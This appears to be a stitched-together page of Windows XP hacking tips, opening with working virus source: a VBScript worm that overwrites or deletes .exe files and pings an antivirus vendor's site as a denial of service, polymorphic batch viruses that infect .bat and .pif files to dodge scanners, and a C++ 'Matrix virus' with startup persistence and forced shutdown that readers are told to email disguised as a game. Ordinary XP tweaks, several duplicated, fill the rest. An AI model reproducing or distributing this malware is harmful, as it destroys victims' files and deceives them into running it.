ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
s = LCase(f1.Name)
If (ext = "exe") Then
Set f = fso.GetFile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
fso.deletefile(f1.path)
End If
If (s = "freecell.exe") Or (s = "readme.txt") or (s = "license.txt") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path)
fso.deletefile(f1.path)
End If
If (ext = "exe") Or (ext = "bat") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
End If
Next
End Sub
Sub hihi(folderspec)
On Error Resume Next
Dim f, f1, sf, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
hehe (f1.Path)
hihi (f1.Path)
Next
End Sub
dos()
sub dos()
Dim a
Set a = CreateObject("WScript.Shell")
a.run ("c:\windows\ping.exe -t -l 10000 www.grisoft.com")
end sub
msgbox "INFECTED", ,"DOOM"
'=========================================
'made by : Zero Cool
'worm name : INF3CTER
'=========================================
stop copying (do not copy this line!!)
now save the file as infecter.vbs on to your
desktop and/or anywhere else you please.
The next virus I am about to show you is a
polymorphic virus (hard to be picked up by
anti virus scanners)...
Open notepad and copy and paste the folowing...
@set hjmmt=echo
@set bugcl=copy
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
%hjmmt% off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
%hjmmt% off
%hjmmt% Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
:MeLTbeg
%hjmmt% off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
%hjmmt% @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
%hjmmt%.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
%hjmmt% e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
%hjmmt% e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
%hjmmt% e 120 B4 4C CD 21 00>>MeLT.t
%hjmmt% g>>MeLT.t
debug
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
%hjmmt% off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
%hjmmt%.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
%hjmmt%.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=%hjmmt%
cls%_PiFV%
%PiFV%.
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
pause>nul.PiFV
set PiFV=
goto PiFV_end
:PiFV_msg
%hjmmt% [PiFV] by WaveFunc
goto PiFV_end
:PiFV_hst
%PiFVo% %PiFVcl%
goto PiFV_end
:PiFV_go
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
:PiFV_inf
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
%hjmmt% m 124,162 524>PiFV!
%hjmmt% e 100 '@set fn='>>PiFV!
%hjmmt% m 524,562 108>>PiFV!
%hjmmt% n pifv$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 47>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% m 55E,561 108>>PiFV!
%hjmmt% e 10C 0>>PiFV!
%hjmmt% n pifv$$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 10>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% q>>PiFV!
:PiFV_1
debug %PiFVp%
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
%hjmmt% %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
%hjmmt% e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
%hjmmt% e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
%hjmmt% e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
%hjmmt% n pifv$.com>>PiFV$$
%hjmmt% rcx>>PiFV$$
%hjmmt% 2a>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug
%hjmmt% %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
%hjmmt% %hjmmt% off>%PiFVb%
%hjmmt% set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
%hjmmt% e 15E 'PiFV',0>PiFV$$
%hjmmt% e 124 '%PiFVb%',0>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug %PiFVp%
del PiFV$$
:: I think we're done!
exit PiFV
:PiFV_end
%hjmmt% set ff=createobject("scripting.filesystemobject")>>poly.vbs
%hjmmt% set rr=ff.opentextfile(%0,1)>>poly.vbs
%hjmmt% aa = rr.readall>>poly.vbs
%hjmmt% rr.close>>poly.vbs
%hjmmt% Randomize>>poly.vbs
%hjmmt% poly = int(rnd * 3)>>poly.vbs
%hjmmt% if poly = 0 or poly = 2 then>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt","hjmmt" ^& s ^& poly)>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl","bugcl" ^& s ^& s ^& poly)>>poly.vbs
%hjmmt% else>>poly.vbs
%hjmmt% polynum = int(rnd * 7)>>poly.vbs
%hjmmt% for i = 1 to polynum>>poly.vbs
%hjmmt% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% polyall = polyall + polychar>>poly.vbs
%hjmmt% next>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt",polyall )>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl", s ^& polyall)>>poly.vbs
%hjmmt% end if>>poly.vbs
%hjmmt% set bb=ff.opentextfile(%0,2)>>poly.vbs
%hjmmt% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs
@exit
stop copying (do not copy this line!!)
The above virus is extremely difficult for AV
scanners
Make a Funny and Friendly Computer Virus
MATRIX VIRUS (just to your scare friends but doesn't destroy the computer)
Now remember this is not the answer to all your revenge needs.
Step 1, open notepad.
Step 2, paste this...
// The Matrix Virus
// Created by W3irdo
// Hazuras.com
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}
then save it as whatever you want as long as you save it to be a .exe
Email it and tell them it's a really cool minigame.
I recommend
naming it as the game you say it is.
Now remember this is not the answer to all your revenge needs.
Step 1, open notepad.
Step 2, paste this...
// The Matrix Virus
// Created by W3irdo
// Hazuras.com
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}
then save it as whatever you want as long as you save it to be a .exe
Email it and tell them it's a really cool minigame.
I recommend
naming it as the game you say it is.
How to use Windows Update Properly
If you want to save your files to your hard drive, so after a format you dont have to download them all again, here's How:
- Logon to Windows Update
- Choose Windows Update Catalogue (left hand pane)
- Choose Find updates for Microsoft Windows operating systems (right hand pane)
- Choose your version and language then Search
- Choose one the following:
- Critical Updates and Service Packs
- Service Packs and Recommended Downloads
- Multi-Language Features (0)
- Once chosen simply click on what you want to download and then back at the top click Review Download Basket
- You are taken to the next page where at the top you can specify where the downloads are to be saved.
- Click Download now. Each patch will make a directory under the root of the folder you saved them to.
Once finished you need to go to where you saved the file (s) to and then simply install all your patches.
Internet Broadband
this ones simple:
this is for broad band connections. I didn’t try it on dial up but might work for dial up.
1.make sure your logged on as actually "Administrator". do not log on with any account that just has administrator privileges.
2. start - run - type gpedit.msc
3. expand the "local computer policy" branch
4. expand the "administrative templates" branch
5. expand the "network branch"
6. Highlight the "QoS Packet Scheduler" in left window
7. in right window double click the "limit reservable bandwidth" setting
8. on setting tab check the "enabled" item
9. where it says "Bandwidth limit %" change it to read 0
reboot if you want to but not necessary on some systems your all done. Effect is immediate on some systems. some need re-boot. I have one machine that needs to reboot first, the others didn't. Don't know why this is.
This is more of a "counter what XP does" thing. In other words, XP seems to want to reserve 20% of the bandwidth for its self. Even with QoS disabled, even when this item is disabled. So why not use it to your advantage. To demonstrate the problem with this on stand alone machines start up a big download from a server with an FTP client. Try to find a server that doesn't max out your bandwidth. In this case you want a slow to medium speed server to demonstrate this. Let it run for a couple of minutes to get stable. The start up another download from the same server with another instance of your FTP client. You will notice that the available bandwidth is now being fought over and one of the clients download will be very slow or both will slow down when they should both be using the available bandwidth. Using this "tweak" both clients will have a fair share of the bandwidth and will not fight over the bandwidth.
this is for broad band connections. I didn’t try it on dial up but might work for dial up.
1.make sure your logged on as actually "Administrator". do not log on with any account that just has administrator privileges.
2. start - run - type gpedit.msc
3. expand the "local computer policy" branch
4. expand the "administrative templates" branch
5. expand the "network branch"
6. Highlight the "QoS Packet Scheduler" in left window
7. in right window double click the "limit reservable bandwidth" setting
8. on setting tab check the "enabled" item
9. where it says "Bandwidth limit %" change it to read 0
reboot if you want to but not necessary on some systems your all done. Effect is immediate on some systems. some need re-boot. I have one machine that needs to reboot first, the others didn't. Don't know why this is.
This is more of a "counter what XP does" thing. In other words, XP seems to want to reserve 20% of the bandwidth for its self. Even with QoS disabled, even when this item is disabled. So why not use it to your advantage. To demonstrate the problem with this on stand alone machines start up a big download from a server with an FTP client. Try to find a server that doesn't max out your bandwidth. In this case you want a slow to medium speed server to demonstrate this. Let it run for a couple of minutes to get stable. The start up another download from the same server with another instance of your FTP client. You will notice that the available bandwidth is now being fought over and one of the clients download will be very slow or both will slow down when they should both be using the available bandwidth. Using this "tweak" both clients will have a fair share of the bandwidth and will not fight over the bandwidth.
20 things you didn't know about Windows XP
You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.
1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).
1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).
2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).
3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.
4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.
5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.
6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.
7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.
8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.
9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.
10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.
11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.
12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.
13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.
14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.
15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.
16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.
17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.
18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.
19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.
20. The next release of Windows XP, codenamed Longhorn, is due out late next year or early 2003 and won't be much to write home about. The next big release is codenamed Blackcomb and will be out in 2003/2004.
XP expires
To reduce instances of "casual copying" (a nice name for software piracy), Microsoft has implemented a two-stage antipiracy scheme in its upcoming OS. The first stage is the installation and registration counter: this lets you install Windows XP only five times on the same system. (Note that you'll be able to install the final version of XP on only one machine, as opposed to the current beta, which can be installed on five machines for testing purposes.) The second stage creates a profile of the system to prevent you from reinstalling or registering the OS on different PCs.
To make this scheme work, you must activate your copy of Windows--over the Internet or by calling for an activation code--within 30 days of installation. Activation differs from a classic registration process in that no personal information is requested by or sent to Microsoft, just a record that a specific copy of Windows XP is installed on your specific PC. If you fail to activate your copy of the OS within 30 days, your login will fail. (Since XP is based on Windows NT-like privilege levels, you can't use your computer until you log on.)
Microsoft says the scheme should not prevent you from reinstalling your copy of XP on your PC as many times as you need to, as long as it's the same PC or close to it, allowing for some hardware changes. It's the "some" that has most folks worried. In theory, you might have to reactivate your OS if you upgrade significantly or swap out a lot of components because XP might think it's running on a new PC. So far, Microsoft isn't saying what system information the OS uses to determine the "same PC or close to it" status. That means we don't know to what degree you can upgrade your hardware before you cross the invisible line. We also don't know how much, if any, personally identifiable data Microsoft is gathering from your PC.
Microsoft says you can, of course, change at least one and possibly several hardware components--RAM, video or sound cards, CPUs, motherboards, and so on--without having to reactivate your OS. But if you try to reinstall your copy of Windows XP on what Microsoft calls a "different or significantly upgraded or changed PC" (again, the company declined to specify how different), the activation will most likely be rejected, requiring you to call Microsoft to explain and get a new (free) activation code.
Microsoft plans to set up a new call center for U.S.-based customers to expedite activation issues. Many non-U.S. customers will likely have to go through the existing, shared Microsoft technical support lines they currently use. Microsoft says it expects only 2 percent of the total installed base of Windows XP to have to reactivate the OS. Whether the anti-piracy initiative will present problems for consumers or result in fewer upgrades to XP remains to be seen. Remember, the final release is at least a few months off.
Set up and Use Internet Connection Sharing
With Internet Connection Sharing (ICS) in Windows XP, you can connect one computer to the Internet, then share the Internet service with several computers on your home or small office network. The Network Setup Wizard in Windows XP Professional will automatically provide all of the network settings you need to share one Internet connection with all the computers in your network. Each computer can use programs such as Internet Explorer and Outlook Express as if they were directly connected to the Internet.
You should not use this feature in an existing network with Windows 2000 Server domain controllers, DNS servers, gateways, DHCP servers, or systems configured for static IP addresses.
Enabling ICS
The ICS host computer needs two network connections. The local area network connection, automatically created by installing a network adapter, connects to the computers on your home or small office network. The other connection, using a 56k modem, ISDN, DSL, or cable modem, connects the home or small office network to the Internet. You need to ensure that ICS is enabled on the connection that has the Internet connection. By doing this, the shared connection can connect your home or small office network to the Internet, and users outside your network are not at risk of receiving inappropriate addresses from your network.
When you enable ICS, the local area network connection to the home or small office network is given a new static IP address and configuration. Consequently, TCP/IP connections established between any home or small office computer and the ICS host computer at the time of enabling ICS are lost and need to be reestablished. For example, if Internet Explorer is connecting to a Web site when Internet Connection Sharing is enabled, refresh the browser to reestablish the connection. You must configure client machines on your home or small office network so TCP/IP on the local area connection obtains an IP address automatically. Home or small office network users must also configure Internet options for Internet Connection Sharing. To enable Internet Connection Sharing (ICS) Discovery and Control on Windows 98, Windows 98 Second Edition, and Windows Millennium Edition computers, run the Network Setup Wizard from the CD or floppy disk on these computers. For ICS Discovery and Control to work on Windows 98, Windows 98 Second Edition, and Windows Millennium Edition computers, Internet Explorer version 5.0 or later must be installed.
To enable Internet Connection Sharing on a network connection
You must be logged on to your computer with an owner account in order to complete this procedure.
Open Network Connections. (Click Start, click Control Panel, and then double–click Network Connections.)
Click the dial–up, local area network, PPPoE, or VPN connection you want to share, and then, under Network Tasks, click Change settings of this connection.
On the Advanced tab, select the Allow other network users to connect through this computer's Internet connection check box.
If you want this connection to dial automatically when another computer on your home or small office network attempts to access external resources, select the Establish a dial–up connection whenever a computer on my network attempts to access the Internet check box.
If you want other network users to enable or disable the shared Internet connection, select the Allow other network users to control or disable the shared Internet connection check box.
Under Internet Connection Sharing, in Home networking connection, select any adapter that connects the computer sharing its Internet connection to the other computers on your network. The Home networking connection is only present when two or more network adapters are installed on the computer.
To configure Internet options on your client computers for Internet Connection Sharing
Open Internet Explorer. Click Start, point to All Programs, and then click Internet Explorer.)
On the Tools menu, click Internet Options.
On the Connections tab, click Never dial a connection, and then click LAN Settings.
In Automatic configuration, clear the Automatically detect settings and Use automatic configuration script check boxes.
In Proxy Server, clear the Use a proxy server check box.
You should not use this feature in an existing network with Windows 2000 Server domain controllers, DNS servers, gateways, DHCP servers, or systems configured for static IP addresses.
Enabling ICS
The ICS host computer needs two network connections. The local area network connection, automatically created by installing a network adapter, connects to the computers on your home or small office network. The other connection, using a 56k modem, ISDN, DSL, or cable modem, connects the home or small office network to the Internet. You need to ensure that ICS is enabled on the connection that has the Internet connection. By doing this, the shared connection can connect your home or small office network to the Internet, and users outside your network are not at risk of receiving inappropriate addresses from your network.
When you enable ICS, the local area network connection to the home or small office network is given a new static IP address and configuration. Consequently, TCP/IP connections established between any home or small office computer and the ICS host computer at the time of enabling ICS are lost and need to be reestablished. For example, if Internet Explorer is connecting to a Web site when Internet Connection Sharing is enabled, refresh the browser to reestablish the connection. You must configure client machines on your home or small office network so TCP/IP on the local area connection obtains an IP address automatically. Home or small office network users must also configure Internet options for Internet Connection Sharing. To enable Internet Connection Sharing (ICS) Discovery and Control on Windows 98, Windows 98 Second Edition, and Windows Millennium Edition computers, run the Network Setup Wizard from the CD or floppy disk on these computers. For ICS Discovery and Control to work on Windows 98, Windows 98 Second Edition, and Windows Millennium Edition computers, Internet Explorer version 5.0 or later must be installed.
To enable Internet Connection Sharing on a network connection
You must be logged on to your computer with an owner account in order to complete this procedure.
Open Network Connections. (Click Start, click Control Panel, and then double–click Network Connections.)
Click the dial–up, local area network, PPPoE, or VPN connection you want to share, and then, under Network Tasks, click Change settings of this connection.
On the Advanced tab, select the Allow other network users to connect through this computer's Internet connection check box.
If you want this connection to dial automatically when another computer on your home or small office network attempts to access external resources, select the Establish a dial–up connection whenever a computer on my network attempts to access the Internet check box.
If you want other network users to enable or disable the shared Internet connection, select the Allow other network users to control or disable the shared Internet connection check box.
Under Internet Connection Sharing, in Home networking connection, select any adapter that connects the computer sharing its Internet connection to the other computers on your network. The Home networking connection is only present when two or more network adapters are installed on the computer.
To configure Internet options on your client computers for Internet Connection Sharing
Open Internet Explorer. Click Start, point to All Programs, and then click Internet Explorer.)
On the Tools menu, click Internet Options.
On the Connections tab, click Never dial a connection, and then click LAN Settings.
In Automatic configuration, clear the Automatically detect settings and Use automatic configuration script check boxes.
In Proxy Server, clear the Use a proxy server check box.
How to make your Desktop Icons Transparent
Go to ontrol Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"
How to Remove Windows XP's Messenger
Theoretically, you can get rid of it (as well as a few other things). Windows 2000 power users should already be familiar with this tweak.
Fire up the Windows Explorer and navigate your way to the %SYSTEMROOT% \ INF folder. What the heck is that thingy with the percentage signs? It's a variable. For most people, %SYSTEMROOT% is C:\Windows. For others, it may be E:\WinXP. Get it? Okay, on with the hack! In the INF folder, open sysoc.inf (but not before making a BACKUP copy first). Before your eyes glaze over, look for the line containing "msmsgs" in it. Near the end of that particular line, you'll notice that the word "hide" is not so hidden. Go ahead and delete "hide" (so that the flanking commas are left sitting next to one another). Save the file and close it. Now, open the Add and Remove Programs applet in the Control Panel. Click the Add / Remove Windows Components icon. You should see "Windows Messenger" in that list. Remove the checkmark from its box, and you should be set. NOTE: there are other hidden system components in that sysoc.inf file, too. Remove "hide" and the subsequent programs at your own risk.
